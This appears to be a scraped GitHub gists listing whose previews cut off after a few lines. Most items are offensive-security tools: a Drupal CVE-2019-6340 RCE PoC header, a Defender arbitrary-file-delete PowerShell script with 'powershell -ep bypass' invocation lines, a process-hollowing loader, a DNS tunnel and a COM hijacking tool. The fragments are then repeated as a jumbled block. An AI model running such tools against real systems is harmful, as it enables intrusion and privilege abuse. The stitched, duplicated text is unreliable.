Erik kernel-sanders

## cve-2019-6340.py
#!/usr/bin/env python3

# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
# 2019 @leonjza

# Technical details for this exploit is available at:
#   https://www.drupal.org/sa-core-2019-003
#   https://www.ambionics.io/blog/drupal8-rce
#   https://twitter.com/jcran/status/1099206271901798400

## 20190730-TLP-WHITE_URGENT11_VxWorks.MD

      
              1 file
            
          
              2 forks
            
          
              8 comments
            
          
              14 stars
            
          
                SwitHak
                / 20190730-TLP-WHITE_URGENT11_VxWorks.MD
            
            
              Last active
              June 5, 2020 08:12
            
              
                Tracking vendors responses to URGENT/11 VxWorks vulnerabilities (Last updated: 2020-02-21 1019 UTC)
              
          
    Advisory (URGENT/11)

UPDATE (2019-10-02 1241 UTC)

General

Armis released new information about the vulnerabilities scope. The vulnerabilities impact more RTOS than expected.
IP Stacks backstory


Some of the vulnerabilities discovered by Armis doesn't resides in VxWorks RTOS but in one part of it, the IP stack. This IP stack named IPNET stack comes from Interpeak AB, a company acquired by Wind River the editor of VxWorks RTOS, the 20th March 2006.
Before been acquired by Wind River, the Interpeak AB company sold IP stacks to several customers of them. Interpeak AB sold 2 major IP stacks named IPNET & IPLITE, IPLITE is a light version of IPNET.


## SuRestore.cpp
//https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/
//https://github.com/decoder-it/BadBackupOperator/blob/master/SuBackup/SuBackup/SuBackup.cpp
//https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function
//https://docs.microsoft.com/en-us/windows/win32/vds/loading-vds
//Replace system command with your code. If DewIt() does not run, check if the vds service is running, it should be on-demand.

#define UNICODE
#include <windows.h>
#include <stdio.h>
#include <Psapi.h>

## resolve_domain_computers.py
#!/usr/bin/env python
# resolve domain computers by @3xocyte

import argparse
import sys
import string

# requires dnspython and ldap3
import dns.resolver
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE

## DefenderArbitraryFileDelete.ps1
# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
# All credits go to @itm4n for this PowerShell script!

# Testing
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
# Real
# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'

$JobCode = {
    function DoMpCmdRunLogFileWriteTriggerJob {

## process-hollowing.cs
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;

namespace Hollowing
{
    public class Loader
    {
        public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");

## README.md

      
              4 files
            
          
              0 forks
            
          
              1 comment
            
          
              2 stars
            
          
                radiantly
                / README.md
            
            
              Last active
              November 12, 2021 23:24
                — forked from lifehome/README.md
            
              
                Cloudflare API v4 Dynamic DNS Update in Bash
              
          
    Cloudflare DDNS bash client with systemd

This is a bash script to act as a Cloudflare DDNS client, useful replacement for ddclient.
How to use?


Put the cfupdater files to /usr/local/bin
chmod +x /usr/local/bin/cfupdater
Create a systemd service unit at /etc/systemd/system/, the cfupdate.service is shown as an example.
Create a systemd timer unit at the same location of the service unit, the cfupdate.timer is shown as an example.
sudo systemctl enable cfupdate.timer
sudo systemctl start cfupdate.timer


## gist:e60cb46b358d74c4801d5ae05fa76c07
MAX_PROCESS_LIMIT=10
systemctl status user.slice |
  egrep "user-[0-9]+\.slice" |
  sed 's/.*user-\([0-9]*\).*/\1/' |  # get uid
  while read uid; do
    test $uid -ne 0 && ( # ignore root
      tasks=$(
        systemctl status user-${uid}.slice |
        grep -e Tasks 2>&1 |
        sed 's/\w*Tasks: \([1-9][0-9]*\) (limit: [0-9]*)/\1/'

## DnsTunnel.cs
using System;
using System.Net.Sockets;
using System.Net;

namespace DnsTunnel
{
    class Program
    {
        static void OpenTunnel(int listenerPort, string targetHost, int targetPort)
        {

## abandonedInprocServer32.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Management;

namespace ComAbandonment
{
    public class ComAbandonment
    {
	#!/usr/bin/env python3

	# CVE-2019-6340 Drupal <= 8.6.9 REST services RCE PoC
	# 2019 @leonjza

	# Technical details for this exploit is available at:
	# https://www.drupal.org/sa-core-2019-003
	# https://www.ambionics.io/blog/drupal8-rce
	# https://twitter.com/jcran/status/1099206271901798400
	//https://decoder.cloud/2018/02/12/the-power-of-backup-operatos/
	//https://github.com/decoder-it/BadBackupOperator/blob/master/SuBackup/SuBackup/SuBackup.cpp
	//https://docs.microsoft.com/en-us/windows/win32/services/writing-a-servicemain-function
	//https://docs.microsoft.com/en-us/windows/win32/vds/loading-vds
	//Replace system command with your code. If DewIt() does not run, check if the vds service is running, it should be on-demand.

	#define UNICODE
	#include <windows.h>
	#include <stdio.h>
	#include <Psapi.h>
	#!/usr/bin/env python
	# resolve domain computers by @3xocyte

	import argparse
	import sys
	import string

	# requires dnspython and ldap3
	import dns.resolver
	from ldap3 import Server, Connection, NTLM, ALL, SUBTREE
	# Taken from https://github.com/itm4n/CVEs/blob/master/CVE-2020-1170/DefenderArbitraryFileDelete.ps1 with minor modifications made where needed for Metasploit.
	# All credits go to @itm4n for this PowerShell script!

	# Testing
	# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ZZ_SANDBOX\WER'"
	# Real
	# powershell -ep bypass -c ". .\DefenderArbitraryFileDelete.ps1; DoMain -TargetFolder 'C:\ProgramData\Microsoft\Windows\WER'

	$JobCode = {
	function DoMpCmdRunLogFileWriteTriggerJob {
	using System;
	using System.Collections.Generic;
	using System.Runtime.InteropServices;
	using System.Text;

	namespace Hollowing
	{
	public class Loader
	{
	public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");
	MAX_PROCESS_LIMIT=10
	systemctl status user.slice \|
	egrep "user-[0-9]+\.slice" \|
	sed 's/.user-\([0-9]\).*/\1/' \| # get uid
	while read uid; do
	test $uid -ne 0 && ( # ignore root
	tasks=$(
	systemctl status user-${uid}.slice \|
	grep -e Tasks 2>&1 \|
	sed 's/\wTasks: \([1-9][0-9]\) (limit: [0-9]*)/\1/'
	using System;
	using System.Net.Sockets;
	using System.Net;

	namespace DnsTunnel
	{
	class Program
	{
	static void OpenTunnel(int listenerPort, string targetHost, int targetPort)
	{
	using System;
	using System.Collections.Generic;
	using System.IO;
	using System.Linq;
	using System.Management;

	namespace ComAbandonment
	{
	public class ComAbandonment
	{